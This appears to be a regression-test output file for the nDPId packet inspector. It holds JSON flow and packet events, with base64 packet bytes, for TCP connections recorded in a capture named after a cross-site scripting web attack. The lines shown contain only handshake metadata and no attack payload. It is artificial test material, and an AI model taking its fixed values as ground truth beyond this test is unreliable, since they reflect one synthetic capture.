-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4384,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1499347493167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347493167,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VdJAAD4Gb\/6sEAABwKgKMuGyAFCUXbzFAAAAAKACchBBjAAAAgQFtAQCCAoBOukXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":2,"flow_last_seen":1499347493167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347493167,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4bJdzKzTlF28xqAScSB5WQAAAgQFtAQCCAoD5LqNATrpFwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4386,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":3,"flow_last_seen":1499347493168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347493168,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VdNAAD4GcAWsEAABwKgKMuGyAFCUXbzGXcys1IAQAOUYYAAAAQEICgE66RgD5LqN"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4393,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347494446,"flow_last_seen":1499347494446,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347494446,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4393,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1499347494446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347494446,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8G1FAAD4Gqn+sEAABwKgKMuHAAFAmKfEGAAAAAKACchB6MQAAAgQFtAQCCAoBOupXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4394,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":2,"flow_last_seen":1499347494446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347494446,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4cATAV39JinxB6AScSBKYAAAAgQFtAQCCAoD5LvNATrqVwEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":3,"flow_last_seen":1499347494447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347494447,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0G1JAAD4GqoasEAABwKgKMuHAAFAmKfEHEwFd\/oAQAOXpZwAAAQEICgE66lcD5LvN"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4405,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347495714,"flow_last_seen":1499347495714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4405,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1499347495714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347495714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ai5AAD4GW6KsEAABwKgKMuHOAFCuqYG6AAAAAKACchBfsgAAAgQFtAQCCAoBOuuUAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4406,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":2,"flow_last_seen":1499347495714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347495714,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4c4n\/DE+rqmBu6AScSBGaAAAAgQFtAQCCAoD5L0KATrrlAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4407,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":3,"flow_last_seen":1499347495715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347495715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ai9AAD4GW6msEAABwKgKMuHOAFCuqYG7J\/wxP4AQAOXlbwAAAQEICgE665QD5L0K"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347365320,"flow_last_seen":1499347370718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347365320,"flow_last_seen":1499347370718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347366586,"flow_last_seen":1499347371718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347366586,"flow_last_seen":1499347371718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347369077,"flow_last_seen":1499347374718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347369077,"flow_last_seen":1499347374718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347370339,"flow_last_seen":1499347375719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347370339,"flow_last_seen":1499347375719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347371602,"flow_last_seen":1499347376719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347371602,"flow_last_seen":1499347376719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347374136,"flow_last_seen":1499347379720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347374136,"flow_last_seen":1499347379720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347498249,"flow_last_seen":1499347498249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347498249,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1499347498249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347498249,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LPFAAD4GmN+sEAABwKgKMuHoAFBfF8L\/AAAAAKACchBrawAAAgQFtAQCCAoBOu4OAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":2,"flow_last_seen":1499347498249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347498249,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4ejKfeZhXxfDAKAScSD4AgAAAgQFtAQCCAoD5L+DATruDgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":3,"flow_last_seen":1499347498250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347498250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LPJAAD4GmOasEAABwKgKMuHoAFBfF8MAyn3mYoAQAOWXCgAAAQEICgE67g4D5L+D"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347499500,"flow_last_seen":1499347499500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347499500,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1499347499500,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347499500,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82IhAAD4G7UesEAABwKgKMuH2AFAMLDfPAAAAAKACchBIQAAAAgQFtAQCCAoBOu9HAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4436,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":2,"flow_last_seen":1499347499500,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347499500,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4fa1N28pDCw30KAScSBgHQAAAgQFtAQCCAoD5MC8ATrvRwEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4437,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":3,"flow_last_seen":1499347499501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347499501,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02IlAAD4G7U6sEAABwKgKMuH2AFAMLDfQtTdvKoAQAOX\/JAAAAQEICgE670cD5MC8"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4450,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347500770,"flow_last_seen":1499347500770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347500770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4450,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1499347500770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347500770,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YZZAAD4GZDqsEAABwKgKMuIEAFAvvZESAAAAAKACchDKIAAAAgQFtAQCCAoBOvCEAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":2,"flow_last_seen":1499347500770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347500770,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4gSIcKZ3L72RE6AScSDWOAAAAgQFtAQCCAoD5MH6ATrwhAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4452,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":3,"flow_last_seen":1499347500770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347500770,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YZdAAD4GZEGsEAABwKgKMuIEAFAvvZETiHCmeIAQAOV1QAAAAQEICgE68IQD5MH6"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347503273,"flow_last_seen":1499347503273,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347503273,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1499347503273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347503273,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JtZAAD4GnvqsEAABwKgKMuIeAFAcz9QgAAAAAKACchCXdAAAAgQFtAQCCAoBOvL2AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":2,"flow_last_seen":1499347503273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347503273,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4h43pRReHM\/UIaAScSCEAAAAAgQFtAQCCAoD5MRrATry9gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4468,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":3,"flow_last_seen":1499347503274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347503274,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JtdAAD4GnwGsEAABwKgKMuIeAFAcz9QhN6UUX4AQAOUjCAAAAQEICgE68vYD5MRr"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347504529,"flow_last_seen":1499347504529,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347504529,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1499347504529,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347504529,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MbJAAD4GlB6sEAABwKgKMuIsAFBuJcWCAAAAAKACchBTdAAAAgQFtAQCCAoBOvQwAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":2,"flow_last_seen":1499347504529,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347504529,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4iwP0\/y\/biXFg6AScSB+NgAAAgQFtAQCCAoD5MWlATr0MAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4479,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":3,"flow_last_seen":1499347504530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347504530,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MbNAAD4GlCWsEAABwKgKMuIsAFBuJcWDD9P8wIAQAOUdPgAAAQEICgE69DAD5MWl"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347505774,"flow_last_seen":1499347505774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505774,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1499347505774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347505774,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8e\/VAAD4GSdusEAABwKgKMuI6AFCzho6SAAAAAKACchBDvgAAAgQFtAQCCAoBOvVnAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4490,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":2,"flow_last_seen":1499347505774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347505774,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4joOXGebs4aOk6AScSAD5AAAAgQFtAQCCAoD5MbdATr1ZwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":3,"flow_last_seen":1499347505775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347505775,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0e\/ZAAD4GSeKsEAABwKgKMuI6AFCzho6TDlxnnIAQAOWi6wAAAQEICgE69WcD5Mbd"} 